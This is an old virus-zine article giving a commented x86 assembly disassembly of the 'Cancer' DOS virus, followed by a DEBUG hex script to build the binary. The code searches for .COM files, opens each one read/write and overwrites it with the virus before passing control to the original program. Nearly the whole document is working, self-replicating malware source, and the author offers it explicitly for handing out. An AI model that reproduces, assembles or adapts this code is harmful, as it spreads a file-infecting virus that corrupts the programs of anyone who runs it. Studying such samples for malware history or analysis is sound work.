Copy Link
Add to Bookmark
Report
SOURCE00.003 - The Cancer Virus [Source/Debug Script]
While I was writing this magazine, I decided to disassemble and comment the Cancer virus to brush up on my disassembly skills. Unlike 40Hex Issue 10, which has begun phasing out debug scripts, as they feel that source code is more useful. Although I agree with that theory, we feel that using BOTH the source code, and the debug script to give out to people will suit both those who are experienced, and those who are not.
Well, here it is:
[--- Cut Here -----------------------------------------------------------------]
code segment byte public
assume cs:code, ds:code
org 100h
; Disassembly By Havoc The Chaos/Trinity
cancer proc far
start: jmp entervirus
dw 4990h
db 56h
counter db 0 ; Number Of Times Ran
comspec db '*.com',0 ; File Spec To Search
db 0E4h
db 03h
realfile dw 0, 8695h ; Where The Real File's Located
filesize dw 0 ; Size Of File Infected
handle dw 0 ; Where The File Name's Stored
entervirus: mov ax,cs
add ax,1000h
mov es,ax
inc counter ; Add To # Times Ran
mov si,100h
xor di,di
mov cx,0E4h
rep movsb
mov dx,1F4h ; Buffer For DTA
mov ah,1Ah ; Set DTA Function
int 21h ; Execute Function
mov dx,offset comspec ; Search For Files
mov cx,6
mov ah,4Eh ; Find First File
int 21h ; Execute Instruction
jc exit ; Jump if carry Set
disease:
mov dx,212h
mov ax,3D02h ; Open File R/W
int 21h ; Execute Instruction
mov handle,ax ; Save Handle
mov bx,ax ; Move It To BX For Readin
push es ; Transfer The Extra Segment...
pop ds ; ... To The Data Segment
mov dx,2E4h ; Buffer For Readin
mov cx,0FFFFh ; Read In 65,535 Bytes. Why?
mov ah,3Fh ; Read File
int 21h ; Execute Function
add ax,2E4h ; Move Filesize To AX
mov cs:filesize,ax ; Store Filesize
xor cx,cx ; Clear Registers...
xor dx,dx
mov bx,cs:handle ; Get Handle Back
mov ax,4200h ; Move File Pointer
int 21h ; Execute Instruction
jc get_newfile ; Exit If Error
mov dx,0
mov cx,cs:filesize ; Recall File Size
mov bx,cs:handle ; Recall File Name
mov ah,40h ; Write To File
int 21h ; Execute Instruction
get_newfile:
mov bx,cs:handle ; Recall File Name
mov ah,3Eh ; Close File
int 21h ; Execute Instruction
push cs ; Transfer The Code To The Data
pop ds ; Segments
mov ah,4Fh ; Find Next File
mov dx,1F4h ; Execute Instruction
int 21h
jc exit ; If No More Files, Quit
jmp disease ; Otherwise Find Some More
exit: mov dx,80h ; Default DTA
mov ah,1Ah ; Set DTA Function
int 21h ; Execute Instruction
mov si,offset bytes ; Move Bytes To Source Index
mov cx,2Bh ; Write 2Bh Times
xor di,di ; To Desination 0
rep movsb ; Do It 2Bh Times
xor di,di
mov cs:realfile,0 ; Set Up To Call Original Pgm
mov word ptr cs:realfile+2,es
jmp dword ptr cs:realfile ; Run Original Program
bytes db 1Eh
db 07h,0BEh,0E4h, 03h, 80h, 3Eh
db 05h, 01h, 01h, 75h, 04h, 81h
db 0EEh, 00h, 02h
loc_5:
mov di,100h ; Set Destination 100h
mov cx,0FFFFh ; 65,535 Bytes
sub cx,si ; Sub Offset From CX
rep movsb ; Do It CX Times
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
jmp dword ptr cs:[100h] ; Goto Orig File
db 0CDh, 20h,0CDh, 20h, 00h
cancer endp
code ends
end start
[--- Cut Here -----------------------------------------------------------------]
n cancer.com
e 0100 EB 15 90 90 49 56 00 2A 2E 63 6F 6D 00 E4 03 00
e 0110 00 95 86 00 00 00 00 8C C8 05 00 10 8E C0 FE 06
e 0120 06 01 BE 00 01 33 FF B9 E4 00 F3 A4 BA F4 01 B4
e 0130 1A CD 21 BA 07 01 B9 06 00 B4 4E CD 21 72 57 BA
e 0140 12 02 B8 02 3D CD 21 A3 15 01 8B D8 06 1F BA E4
e 0150 02 B9 FF FF B4 3F CD 21 05 E4 02 2E A3 13 01 33
e 0160 C9 33 D2 2E 8B 1E 15 01 B8 00 42 CD 21 72 11 BA
e 0170 00 00 2E 8B 0E 13 01 2E 8B 1E 15 01 B4 40 CD 21
e 0180 2E 8B 1E 15 01 B4 3E CD 21 0E 1F B4 4F BA F4 01
e 0190 CD 21 72 02 EB A9 BA 80 00 B4 1A CD 21 BE BA 01
e 01A0 B9 2B 00 33 FF F3 A4 33 FF 2E C7 06 0F 01 00 00
e 01B0 2E 8C 06 11 01 2E FF 2E 0F 01 1E 07 BE E4 03 80
e 01C0 3E 05 01 01 75 04 81 EE 00 02 BF 00 01 B9 FF FF
e 01D0 2B CE F3 A4 2E C7 06 00 01 00 01 2E 8C 1E 02 01
e 01E0 2E FF 2E 00 01 CD 20 CD 20 00
rcx
EA
w
q
[--- Cut Here -----------------------------------------------------------------]
- Havoc
